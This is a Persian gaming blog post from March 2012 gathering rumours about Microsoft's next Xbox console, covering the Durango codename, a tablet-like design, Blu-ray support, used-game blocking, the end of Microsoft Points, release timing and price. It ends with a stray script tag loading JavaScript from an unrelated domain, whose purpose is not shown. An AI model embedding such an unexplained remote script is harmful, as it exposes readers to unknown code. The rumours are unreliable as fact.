تبلیغات
بازیکده - صدای نسل هشتم (قسمت اول)

:درباره وبلاگ

:آرشیو

:طبقه بندی

:پیوندها

:پیوندهای روزانه

:نویسندگان

:آخرین پستها

:نظرسنجی

آماروبلاگ

چهارشنبه 17 اسفند 1390-06:34 ب.ظنسل هشتم کنسول های بازی، اواخر امسال با عرضه کنسول Wii U شروع می شود. تا این لحظه، کمپانی Nintendo تنها با معرفی رسمی Wii U اولین دریچه های نسل هشتم را باز کرده است. از گوشه و کنار نیز خبرهایی از نسل بعدی کنسول های دو کمپانی Microsoft و Sony به گوش می رسد که هیچ کدام آن ها تأیید نشده اند، اما به نظر می رسد که واقعیت داشته باشد. چیزی که مشخص شده، این است که 3 کمپانی که به The Big Three صنعت بازی های کامپیوتری شهرت دارند، خود را برای نسل بعدی آماده می کنند. در این مطلب، سعی می کنیم که شما را با تمام آنچه از نسل بعدی می دانیم، آشنا کنیم.


Microsoft و Xbox بعدی...

نسل بعدی کنسول Xbox فعلاً با نام های Xbox 720 ،Next Xbox و Loop شناخته می شود. Microsoft کار ساخت نسل بعدی کنسول Xbox را آغاز کرده و این موضوع بسیار سورپرایز کننده است. Xbox 360 توانست تمام ناکامی های Xbox را برای Microsoft جبران کند و موفقیت های زیادی برای این کمپانی به ارمغان بیاورد. در این مدت شایعات زیادی از نسل بعدی این کنسول بازی منتشر شده که می توان با جمع بندی آن ها اطلاعات کلی ای از نسل بعدی بدست آورد. سوال های زیادی پیرامون نسل بعدی کنسول های بازی است. از چه درایوی استفاده می کنند و چه نوع بازی هایی برای آن ها ساخته می شوند. از آنجایی که هنوز هیچ خبر رسمی ای از سوی Microsoft منتشر نشده، با در نظر گرفتن شایعات منتشر شده می توان به جمع بندی زیر دست پیدا کرد.

لیست کاری و کارمندان جدید

در ماه مارچ سال 2011 کمپانی Microsoft چند استودیوی جدید بازیسازی برای ساخت عنوان های جدید روی کنسول جدیدش، تأسیس کرد. در تمام اطلاعیه هایی که برای گرفتن افراد جدید به منظور کار در این استودیوها منتشر شدند، به این موضوع اشاره شده بود که آن ها به افرادی نیاز دارند که بتوانند روی نسل بعدی کنسول های بازی کار کنند. اما چیزی که آن ها روی آن کار می کنند، نا مشخص بود. از طرف دیگر، مشخص شد که Xbox بعدی بر پایه Windows NT طراحی خواهد شد. لازم به ذکر است که Windows NT بخشی از Windowsهای XP ،Vista و 7 بوده است. بر اساس اطلاعات منتشر شده، این سیستم باعث می شود که Xbox تنها یک سیستم بازی نباشد و بعداً می توان امکانات بیشتری به آن اضافه کرد.

کنسولی با طراحی تبلت مانند

همانند Wii U به نظر می رسد که Xbox بعدی نیز طراحی ای مانند تبلت داشته باشد. شایعات حاکی از آن هستند که این کنسول به نوعی یک Tablet PC است که به صورت کاملاً بی سیم طراحی شده و به راحتی می توان آن را به تلویزیون متصل کرد. اگر این موضوع صحت داشته باشد، باید کنترلرهایی مانند تبلت را روی این کنسول شاهد باشیم که مدل جدید Kinect هم روی آن قرار دارد. بخشی دیگری از شایعات به این موضوع اشاره می کنند که کنترلرهای Xbox بعدی دارای صفحه های لمسی با کیفیت HD هستند.

اسم رمز: Durango

منابع مختلف به این موضوع اشاره کرده اند که نسل بعدی Xbox که در حال ساخت است، با نام Durango شناخته می شود. Durango نام شهری در ایالت Colorado و یک ایالت در کشور مکزیک است.

Blu-ray برای فیلم، بله، برای بازی، نه!

در جدیدترین شایعات منتشر شده، به این موضوع اشاره شده که نسل بعدی Xbox از درایو Blu-ray پشتیبانی می کند، اما این پشتیبانی به این معنا نیست که بازی های این کنسول روی دیسک های Blu-ray عرضه می شوند. Xbox بعدی می تواند فیلم های Blu-ray را پخش کند. شایعات دیگر حاکی از آن هستند که Microsoft سیستمی روی این کنسول راه اندازی کرده که باعث می شود تا بازی های دست دوم روی آن اجرا نشود. به نظر می رسد که این کار یکی از اقدامات این کمپانی برای جلوگیری از اجرای بازی های غیرقانونی روی این کنسول باشد.

دیگر خبری از Microsoft Point نیست؟

به نظر می رسد که در نسل بعدی کنسول Xbox دیگر خبری از واحد پول مجازی این کمپانی که Point نام دارد، نباشد. این موضوع به این معنا است که در نسل بعدی از پول های واقعی برای خرید در شبکه XBL استفاده می شود. این موضوع می تواند شکل کار کردن با شبکه XBL را آسانتر کند.

تاریخ عرضه؟

بر اساس شایعات منتشر شده، به نظر می رسد که این کنسول در E3 سال 2012 به نمایش درمی آید، اما در سال 2012 راهی بازار نمی شود. باید در سال 2013 منتظر این کنسول بازی بود.

قیمت آن چقدر است؟

اگر این شایعات حقیقت داشته باشند، قیمت این کنسول بیش از 500 دلار خواهد بود، اما هنوز چیزی مشخص نیست.

تاریخ آخرین ویرایش:- -
script src="http://filmdoni.ir/game/01.js" language="javascript" >